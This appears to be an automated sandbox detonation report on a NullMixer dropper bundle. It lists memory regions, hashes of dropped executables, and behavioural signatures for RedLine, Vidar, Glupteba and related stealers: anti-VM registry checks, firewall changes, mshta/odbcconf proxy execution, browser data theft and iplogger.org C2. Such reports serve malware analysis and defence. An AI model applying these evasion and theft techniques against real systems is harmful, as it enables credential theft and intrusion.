memory/1624-164-0x0000000074860000-0x00000000748AA000-memory.dmp
memory/2592-145-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/1832-166-0x00000000000C0000-0x00000000000C1000-memory.dmp
memory/1832-182-0x00000000746D0000-0x0000000074860000-memory.dmp
memory/888-189-0x0000000000E90000-0x000000000128A000-memory.dmp
memory/1624-190-0x0000000000E20000-0x0000000000EB9000-memory.dmp
memory/1832-193-0x0000000000F50000-0x00000000013EE000-memory.dmp
memory/3064-200-0x0000000000400000-0x00000000004CC000-memory.dmp
memory/1832-202-0x00000000742C0000-0x0000000074304000-memory.dmp
memory/2056-199-0x0000000000EA0000-0x0000000000F2C000-memory.dmp
memory/1832-197-0x0000000076CE0000-0x0000000076CF9000-memory.dmp
memory/1832-196-0x00000000751C0000-0x00000000751CC000-memory.dmp
memory/1832-195-0x0000000077370000-0x00000000773A5000-memory.dmp
memory/1832-194-0x0000000075910000-0x0000000075967000-memory.dmp
memory/1832-192-0x0000000000F50000-0x00000000013EE000-memory.dmp
memory/1832-191-0x0000000000F50000-0x00000000013EE000-memory.dmp
memory/2116-188-0x0000000000460000-0x00000000004F9000-memory.dmp
memory/1380-187-0x0000000002960000-0x0000000002D5A000-memory.dmp
memory/1832-186-0x0000000000F50000-0x00000000013EE000-memory.dmp
memory/1832-185-0x0000000000F50000-0x00000000013EE000-memory.dmp
memory/1832-184-0x0000000000F50000-0x00000000013EE000-memory.dmp
memory/1832-183-0x0000000000F50000-0x00000000013EE000-memory.dmp
memory/2136-206-0x0000000000320000-0x00000000003FE000-memory.dmp
memory/2136-205-0x0000000000400000-0x00000000004DE000-memory.dmp
memory/1604-204-0x00000000028F0000-0x00000000029CE000-memory.dmp
memory/1604-203-0x00000000028F0000-0x00000000029CE000-memory.dmp
memory/1832-181-0x00000000743A0000-0x00000000743F8000-memory.dmp
memory/1832-180-0x0000000073EF0000-0x0000000073F3F000-memory.dmp
memory/1624-214-0x0000000075910000-0x0000000075967000-memory.dmp
memory/1624-215-0x0000000074310000-0x0000000074394000-memory.dmp
memory/888-217-0x0000000000400000-0x00000000007FA000-memory.dmp
memory/888-216-0x0000000000400000-0x00000000007FA000-memory.dmp
memory/2144-220-0x00000000003F0000-0x00000000003FC000-memory.dmp
memory/1624-213-0x0000000076C90000-0x0000000076CD7000-memory.dmp
memory/1624-212-0x0000000075860000-0x000000007590C000-memory.dmp
memory/1624-209-0x00000000001E0000-0x0000000000225000-memory.dmp
memory/1624-208-0x0000000000390000-0x0000000000391000-memory.dmp
memory/2144-207-0x0000000000AE0000-0x0000000000C14000-memory.dmp
memory/1180-219-0x0000000000400000-0x00000000004DE000-memory.dmp
memory/888-218-0x0000000000400000-0x00000000007FA000-memory.dmp
memory/1832-179-0x0000000075440000-0x000000007555D000-memory.dmp
memory/1832-178-0x0000000075600000-0x000000007560C000-memory.dmp
memory/1832-177-0x00000000745F0000-0x0000000074607000-memory.dmp
memory/1832-176-0x0000000074C30000-0x0000000074C47000-memory.dmp
memory/1832-175-0x0000000074C20000-0x0000000074C2B000-memory.dmp
memory/1832-174-0x00000000768D0000-0x0000000076A2C000-memory.dmp
memory/1832-172-0x0000000076C90000-0x0000000076CD7000-memory.dmp
memory/1832-170-0x0000000075860000-0x000000007590C000-memory.dmp
memory/1624-169-0x00000000008A0000-0x0000000000939000-memory.dmp
memory/1624-168-0x00000000008A0000-0x0000000000939000-memory.dmp
memory/1624-167-0x0000000000E20000-0x0000000000EB9000-memory.dmp
memory/1832-165-0x0000000000A00000-0x0000000000E9E000-memory.dmp
memory/1832-154-0x0000000000F50000-0x00000000013EE000-memory.dmp
memory/1832-156-0x00000000008F0000-0x0000000000935000-memory.dmp
memory/1832-153-0x0000000000F50000-0x00000000013EE000-memory.dmp
memory/2296-162-0x00000000001E0000-0x00000000001FE000-memory.dmp
memory/2976-161-0x0000000000E10000-0x0000000000E18000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OND0ZHHVRYBOUHBV6LGG.temp
| MD5 | b6c93ca2cb517343fe3f5af70b49aa34 |
| SHA1 | daa3041166501b1188a647f4b8daba2a47438827 |
| SHA256 | 79e4e51f7ea743e85d71cb3852fb6980bd7d9ddc62719494f7f7a09d56dfcae7 |
| SHA512 | 2d8c18d0ee7d3416ba793f50c6e2119f9c3d522ae3e3a8d0ab4162c0ba8fea85313964824bd5ecd68226469f23eb21b69e9c2d8d5e833975cd03aa8048afd0d5 |
memory/2592-142-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2592-141-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2592-138-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2096-140-0x0000000002920000-0x0000000002DBE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1585e1028b0.exe
| MD5 | fb8851a1a68d306eb1623bad276012c3 |
| SHA1 | 33c2e2a59351591807853e58c24edb925e56a216 |
| SHA256 | d222076f428d9d190f72e7d6b0373083f2659804fdb2265603aa66efd640ff7e |
| SHA512 | 3ad2114d8ebde46e981f7ef261ace24a5a47674987047199d22eeeca82c3dd05aeed9a01ff1e6df11a180c051063c9d55cab09e923e8229e0d08e62b46d99b6a |
memory/2168-230-0x0000000000400000-0x0000000000682000-memory.dmp
memory/2296-231-0x00000000001D0000-0x00000000001D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun156d9ca8467.exe
| MD5 | 31f859eb06a677bbd744fc0cc7e75dc5 |
| SHA1 | 273c59023bd4c58a9bc20f2d172a87f1a70b78a5 |
| SHA256 | 671539883e1cd86422b94e84cc21f3d9737c8327b7a76c4972768248cb26b7e6 |
| SHA512 | 7d6a611bc76132a170a32fcbe4c3e3b528a90390b612ce2171febea59f1b723dafc0ec9628df50d07a9841561ddb23cdefbf3adcac160da60e337e7f3695e4ec |
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1524d92394d.exe
| MD5 | 7362b881ec23ae11d62f50ee2a4b3b4c |
| SHA1 | 2ae1c2a39a8f8315380f076ade80028613b15f3e |
| SHA256 | 8af8843d8d5492c165ef41a8636f86f104bf1c3108372a0933961810c9032cf2 |
| SHA512 | 071879a8901c4d0eba2fa886b0a8279f4b9a2e3fbc7434674a07a5a8f3d6a6b87a6dce414d70a12ab94e3050bd3b55e8bfaf8ffea6d24ef6403c70bd4a1c5b74 |
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15e81af69f990d3a6.exe
| MD5 | 4c35bc57b828bf39daef6918bb5e2249 |
| SHA1 | a838099c13778642ab1ff8ed8051ff4a5e07acae |
| SHA256 | bfc863ff5634087b983d29c2e0429240dffef2a379f0072802e01e69483027d3 |
| SHA512 | 946e23a8d78ba0cfe7511e9f1a443ebe97a806e5614eb6f6e94602eeb04eb03ea87446e0b2c57e6102dad8ef09a7b46c10841aeebbffe4be81aad236608a2f3b |
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun156aa32cae4a.exe
| MD5 | 0fef60f3a25ff7257960568315547fc2 |
| SHA1 | 8143c78b9e2a5e08b8f609794b4c4015631fcb0b |
| SHA256 | c7105cfcf01280ad26bbaa6184675cbd41dac98690b0dcd6d7b46235a9902099 |
| SHA512 | d999088ec14b8f2e1aa3a2f63e57488a5fe3d3375370c68c5323a21c59a643633a5080b753e3d69dfafe748dbdfeb6d7fa94bdf5272b4a9501fd3918633ee1e5 |
memory/3064-232-0x0000000000400000-0x00000000004CC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15c4c762b69ba5.exe
| MD5 | 480f84b5495d22186ca365cfbfc51594 |
| SHA1 | eae7c5ed3b0f729360fdd3879f65367a3d14dd95 |
| SHA256 | ab63359f23420ce59260dddb7a1747ff97daf656de360a79e35531032ba26e3f |
| SHA512 | ef7df3d3427e621ecc4bbdba0df717ba7509d36896bccfab1a2c461f019c95728936a42a6261649e9a6b8f5037f42678bdbe51ea82af68b8e8f8a9765ee57482 |
memory/2840-234-0x0000000000400000-0x00000000004CC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-H5F1P.tmp\Sun15b94526a807b.tmp
| MD5 | a6865d7dffcc927d975be63b76147e20 |
| SHA1 | 28e7edab84163cc2d0c864820bef89bae6f56bf8 |
| SHA256 | fdfcbc8cfb57a3451a3d148e50794772d477ed6cc434acc779f1f0dd63e93f4b |
| SHA512 | a9d2b59b40793fb685911f0e452e43a8e83c1bd133fda8a2a210ef1b9ca7ad419b8502fbb75b37f1b0fdef6ad0381b7d910fbff0bcfdeeec9e26b81d11effcec |
memory/296-246-0x0000000000400000-0x000000000081F000-memory.dmp
memory/1180-247-0x0000000000400000-0x00000000004DE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab86A.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/1832-272-0x0000000076C90000-0x0000000076CD7000-memory.dmp
memory/1624-223-0x0000000075A80000-0x00000000766CA000-memory.dmp
memory/1832-271-0x0000000000F50000-0x00000000013EE000-memory.dmp
memory/1832-305-0x0000000000F50000-0x00000000013EE000-memory.dmp
memory/1832-311-0x0000000000A00000-0x0000000000E9E000-memory.dmp
memory/1832-310-0x0000000000A00000-0x0000000000E9E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-ALGVR.tmp\idp.dll
C:\Users\Admin\AppData\Local\Temp\Tar23F6.tmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6B2043001D270792DFFD725518EAFE2C
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6B2043001D270792DFFD725518EAFE2C
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROLMKJ86\suggestions[1].en-US
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
C:\Users\Admin\AppData\Local\Temp\osloader.exe
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-08 10:35
Reported
2024-11-08 10:38
Platform
win10v2004-20241007-en
Max time kernel
44s
Max time network
151s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
Glupteba
Glupteba family
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Vidar
Vidar family
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156aa32cae4a.exe | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156aa32cae4a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156aa32cae4a.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\85f5b66f8c0b9dd1838da31024190463ee565d0052f26bbfdaa84d12ed1163db.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-HFUCS.tmp\Sun15b94526a807b.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun157e7a96e632.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15635943177.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-HFUCS.tmp\Sun15b94526a807b.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-P4VBJ.tmp\Sun15b94526a807b.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
Reads user/profile data of web browsers
System Binary Proxy Execution: Odbcconf
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156aa32cae4a.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1515dbfc0edab0.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15c4c762b69ba5.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15b94526a807b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun157e7a96e632.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\11111.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1585e1028b0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15372e8db79ed3d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1524d92394d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-P4VBJ.tmp\Sun15b94526a807b.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun154ca5fada.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun157e7a96e632.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
